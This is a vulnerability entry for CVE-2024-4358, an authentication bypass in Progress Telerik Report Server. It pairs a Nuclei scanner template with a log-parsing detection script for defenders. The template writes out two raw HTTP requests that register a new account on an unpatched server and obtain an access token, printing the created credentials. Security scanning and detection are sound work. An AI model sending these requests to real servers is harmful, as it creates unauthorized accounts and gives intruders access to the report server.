Progress Telerik Report Server - Authentication Bypass

Date: 2024-06-03 10:40:34
Source: ProjectDiscovery (github.com)
Tags: cve, telerik, progress, authentication, bypass, iis, vuln, unauthenticated, attacker, access, update

CVSS3: 9.9 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

AI Score: 9.7 High (Confidence: High)
EPSS: 0.938 High (Percentile: 99.2%)

In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.

id: CVE-2024-4358

info:
  name: Progress Telerik Report Server - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
  impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
  remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later.
  reference:
    - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
    - https://github.com/sinsinology/CVE-2024-4358
    - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"Log in | Telerik Report Server"
  tags: cve,cve2024,telerik,progress,auth-bypass,instrusive
variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /Startup/Register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}

      - |
        POST /Token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        grant_type=password&username={{user}}&password={{pass}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains_all(body_2, "access_token", "userName", "token_type")'
          - 'status_code_2 == 200'
        condition: and

    extractors:
      - type: regex
        name: token
        part: body_2
        group: 1
        regex:
          - '"access_token":"([A-Z0-9a-z_-]+)"'
        internal: true

      - type: dsl
        dsl:
          - '"Username: "+ user'
          - '"Password: "+ pass'
# digest: 4b0a00483046022100b40c2678a88f956f4c6349fda05d4d83541374a2907b8731a90941505551b493022100f53a3591f5bd4a3fb03698db001d452302dd2217004277971fc01d9af5e9569f:922c64590222798bb761d5b6d8e72950
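
A defender-side check derived from the two requests in the template above, as an added example that is not part of the original template or ProjectDiscovery's code: it scans IIS W3C logs for POSTs to /Startup/Register and notes whether the same client then received a 200 from /Token. The log lines are constructed, the field layout and the 5-minute window are assumptions, and it assumes that on an already configured server no legitimate client posts to /Startup/Register.

```python
from datetime import datetime, timedelta

# Constructed IIS W3C log sample (not real traffic); field order comes from the #Fields line.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2024-06-04 09:12:01 GET /Account/Login 198.51.100.7 200
2024-06-04 09:12:03 POST /Startup/Register 198.51.100.7 200
2024-06-04 09:12:04 POST /Token 198.51.100.7 200
2024-06-04 09:30:10 POST /Token 192.0.2.15 200
2024-06-04 10:02:44 POST /startup/register 203.0.113.9 404
"""

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def find_register_attempts(text, window=timedelta(minutes=5)):
    """Return one finding per POST to /Startup/Register, noting whether the same
    client then obtained a 200 from /Token within `window` (assumed value)."""
    rows = []
    for r in parse_w3c(text):
        r["ts"] = datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S")
        r["path"] = r["cs-uri-stem"].lower().rstrip("/")  # match paths case-insensitively
        rows.append(r)
    findings = []
    for r in rows:
        if r["cs-method"] != "POST" or r["path"] != "/startup/register":
            continue
        token_issued = any(
            t["c-ip"] == r["c-ip"] and t["cs-method"] == "POST" and t["path"] == "/token"
            and t["sc-status"] == "200" and timedelta(0) <= t["ts"] - r["ts"] <= window
            for t in rows)
        findings.append({"time": r["ts"].isoformat(sep=" "), "client": r["c-ip"],
                         "register_status": int(r["sc-status"]),
                         "token_issued": token_issued})
    return findings

if __name__ == "__main__":
    for finding in find_register_attempts(SAMPLE_LOG):
        print(finding)
```

A finding with token_issued set to True is a reason to review the Report Server user list for accounts created at that time.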